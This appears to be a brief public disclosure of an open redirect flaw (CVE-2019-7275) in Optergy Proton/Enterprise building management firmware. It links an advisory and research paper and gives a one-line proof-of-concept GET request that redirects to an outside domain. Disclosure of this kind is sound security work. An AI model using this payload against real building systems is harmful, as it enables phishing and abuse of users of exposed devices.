Optergy Proton/Enterprise BMS versions 2.3.0a and below suffer from an open redirect vulnerability.
17bf508790a35f00f9006815cf4fefd33588eb2cb45d01490c42301f1a378f07
Open Redirect in Optergy Proton/Enterprise BMS
Firmware version: <=2.3.0a
CVE: CVE-2019-7275
Advisory: https://applied-risk.com/resources/ar-2019-008
Paper: https://applied-risk.com/resources/i-own-your-building-management-system
by Gjoko 'LiquidWorm' Krstic
GET /updating.jsp?url=https://segfault.mk HTTP/1.1